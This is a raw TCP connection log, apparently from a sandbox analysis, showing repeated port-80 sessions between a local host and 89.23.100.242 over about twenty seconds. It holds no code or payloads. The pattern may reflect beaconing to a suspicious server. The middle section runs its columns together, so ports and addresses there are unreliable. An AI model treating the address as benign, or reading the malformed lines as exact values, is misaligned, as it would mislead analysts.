Jan 10, 2025 07:58:09.941582918 CET  49841  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.941729069 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:09.946609974 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.298403025 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.303345919 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.303441048 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.303467989 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.681381941 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.735925913 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.808757067 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.860945940 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.956888914 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.957185984 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.961915970 CET  80     49849  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.962147951 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:10.962219954 CET  49849  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.962253094 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.962347984 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:10.967132092 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:11.314213991 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:11.319174051 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:11.319232941 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:11.319261074 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:11.725784063 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:11.782841921 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:11.860409021 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:11.907721043 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.007509947 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.008455992 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.015341997 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.015397072 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.015495062 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.016343117 CET  80     49856  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.016387939 CET  49856  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.020275116 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.360898018 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.365773916 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.365789890 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.365803003 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.755327940 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.798330069 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:12.905602932 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:12.954567909 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.029373884 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.029675961 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.034554958 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.037344933 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.037450075 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.038598061 CET  80     49864  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.041142941 CET  49864  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.042274952 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.392235994 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:13.397222042 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.397280931 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.397310019 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.794368982 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.946679115 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:13.949399948 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.075392008 CET  49879  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.075603962 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.080282927 CET  80     49879  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.080641985 CET  80     49872  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.080723047 CET  49872  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.080730915 CET  49879  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.081201077 CET  49879  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.086090088 CET  80     49879  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.439058065 CET  49879  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.443988085 CET  80     49879  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.444125891 CET  80     49879  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.444154978 CET  80     49879  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.726224899 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.726452112 CET  49879  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.731208086 CET  80     49885  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.731751919 CET  80     49879  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.731884956 CET  49879  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.731895924 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.732002020 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.736841917 CET  80     49885  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.840969086 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.845897913 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:14.849148989 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.849236965 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:14.854176998 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.079663038 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.084538937 CET  80     49885  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.084748030 CET  80     49885  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.204655886 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.209580898 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.209614992 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.209645987 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.476474047 CET  80     49885  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.517082930 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.611236095 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.704827070 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.732343912 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.732484102 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.732894897 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.737410069 CET  80     49885  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.737503052 CET  49885  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.737677097 CET  80     49886  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.737726927 CET  49886  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.737873077 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:15.737937927 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.738004923 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:15.742839098 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.095899105 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.100912094 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.100949049 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.100975990 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.493371964 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.548325062 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.628550053 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.673331976 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.748084068 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.748415947 CET  49900  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.753340006 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.753459930 CET  80     49893  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:16.753559113 CET  49893  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.754023075 CET  49900  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.754162073 CET  49900  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:16.758982897 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.111007929 CET  49900  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:17.116219044 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.116256952 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.116285086 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.499454021 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.634829998 CET  80     49900  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.637500048 CET  49900  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:17.763510942 CET  49908  80     192.168.2.4    89.23.100.242
Jan 10, 2025 07:58:17.940099001 CET  80     49908  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:17.940201044 CET  49908  80     192.168.2.4    89.23.100.242
                                                                                                Jan 10, 2025 07:58:17.940373898 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:17.945594072 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.298494101 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.303495884 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.303531885 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.303563118 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.682701111 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.735821962 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.816788912 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.860883951 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.935395956 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.935574055 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.940474033 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.940576077 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.940625906 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.940659046 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.940762997 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.945615053 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.298449039 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:19.303522110 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.303560019 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.303589106 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.712601900 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.813973904 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:19.842578888 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.017107010 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.249010086 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.249309063 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.254208088 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.254278898 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.254293919 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.254331112 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.254432917 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.259385109 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.498903990 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.503845930 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.503932953 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.510812998 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.515765905 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.610934019 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.615029097 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.616097927 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.616137028 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.616164923 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.662180901 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.762479067 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.762537003 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.781469107 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.786485910 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.786596060 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.786803007 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.791594028 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.861207008 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.866198063 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.866417885 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.142388105 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.147622108 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.147659063 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.147691965 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.384130001 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.438735962 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.438796997 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.607119083 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.657833099 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.759690046 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.813985109 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.878506899 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.878626108 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.883357048 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.883527040 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.883570910 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.883951902 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.884005070 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.888237953 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.888308048 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.888396978 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.893184900 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.235941887 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:22.240956068 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.240991116 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.241019011 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.624304056 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.756917953 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.757066011 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.439750910 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.446047068 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.446430922 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.446549892 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.452595949 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.798440933 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.803719044 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.803756952 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.803785086 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.203321934 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.251471043 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.340606928 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.393752098 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.469178915 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.469420910 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.474328995 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.474375963 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.474385023 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.474452019 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.474577904 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.479665995 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.829755068 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.835247040 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.835267067 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.835278988 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.264178991 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.313986063 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.390616894 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.390763044 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.396301031 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.396378040 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.396456957 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.396512032 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.396646976 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.402106047 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.787328959 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.792172909 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.792188883 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.792196989 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.134363890 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.204737902 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.285588980 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.405172110 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.405412912 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.411087990 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.411148071 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.411263943 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.411309004 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.411359072 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.417212009 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.458033085 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.462884903 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.462949991 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.463062048 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.467875957 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.767345905 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.772207975 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.772218943 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.772227049 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.814057112 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.818938017 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.819041967 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.151107073 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.200588942 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.204634905 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.251501083 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.280587912 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.282202959 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.287285089 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.287349939 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.412123919 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.412839890 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.417182922 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.417231083 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.417628050 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.417687893 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.417792082 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.422590971 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.767205000 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.772161007 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.772171974 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.772181034 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.164181948 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.204762936 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.294439077 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.345216990 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.425707102 CET4997980192.168.2.489.23.100.242
Jan 10, 2025 07:58:28.432965994 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:28.433038950 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:28.433119059 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:28.437993050 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:28.782846928 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:28.787863970 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:28.787879944 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:28.787897110 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.187602043 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.235853910 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.339036942 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.392218113 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.466267109 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.466479063 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.471359968 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.471421957 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.471457005 CET  80  49979  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.471498013 CET  49979  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.471561909 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.477256060 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.829740047 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:29.834923983 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.834938049 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:29.834945917 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.209095001 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.314022064 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.336771011 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.448101997 CET  49973  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.452274084 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.452543974 CET  49996  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.457428932 CET  80  49990  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.457442999 CET  80  49996  89.23.100.242  192.168.2.4
Jan 10, 2025 07:58:30.457515955 CET  49990  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.457520008 CET  49996  80  192.168.2.4  89.23.100.242
Jan 10, 2025 07:58:30.457621098 CET  49996  80  192.168.2.4  89.23.100.242
